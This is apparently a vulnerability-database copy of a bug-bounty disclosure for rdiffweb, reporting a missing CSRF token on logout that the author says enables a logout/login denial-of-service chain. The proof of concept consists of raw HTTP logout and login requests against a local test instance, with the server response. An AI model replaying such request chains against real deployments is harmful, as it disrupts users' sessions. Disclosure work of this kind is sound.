Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrRezaduty17BC1B0F-1F5C-432F-88E4-C9866CCF6E10
HistoryDec 05, 2022 - 6:41 a.m.

Lack of CSRF Token in Logout

2022-12-0506:41:25
rezaduty
www.huntr.dev
12
csrf token logout chaining dos

EPSS

0.001

Percentile

30.1%

JSON

Description

we haven’t csrf token in logout basically this is not really issue but in rdiffweb we have logically redirect user to last source like logout method.
in this case attacker can chain two request(logout,login) that lead to dos

Proof of Concept

  1. send get logout request and get session_id
GET /logout HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
  1. send login request with previous session_id in response
POST /login/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Cookie: session_id=0fc203ce03dac2a8cc4dafc1852b920643aa8e85
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

login=admin&password=admin123&submit=Sign+in

response like that

HTTP/1.1 303 See Other
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.8.0
Date: Mon, 05 Dec 2022 06:40:58 GMT
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'
Location: http://127.0.0.1:8080/
Content-Language: en_US
Vary: Accept-Encoding
Content-Length: 90
Set-Cookie: session_id=4e13178447f685e835b6f9c78fdd203b32f8048a; HttpOnly; Path=/; SameSite=Lax
Connection: close

This resource can be found at <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>.
  1. login and logout unlimit

Related

osv 3
cvelist 1
veracode 1
github 1
cve 1
prion 1
nvd 1
osv
osv
CVE-2022-4646
2022-12-22 02:15:08
rdiffweb vulnerable to Cross-Site Request Forgery
2022-12-22 03:30:18
PYSEC-2022-43004
2022-12-22 02:15:00
cvelist
cvelist
CVE-2022-4646 Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
2022-12-22 00:00:00
veracode
veracode
Cross Site Request Forgery (CSRF)
2022-12-27 05:05:18
github
github
rdiffweb vulnerable to Cross-Site Request Forgery
2022-12-22 03:30:18
cve
cve
CVE-2022-4646
2022-12-22 02:15:08
prion
prion
Cross site request forgery (csrf)
2022-12-22 02:15:00
nvd
nvd
CVE-2022-4646
2022-12-22 02:15:08

EPSS

0.001

Percentile

30.1%

JSON
Related for 17BC1B0F-1F5C-432F-88E4-C9866CCF6E10
osv3cvelist1veracode1github1cve1prion1nvd1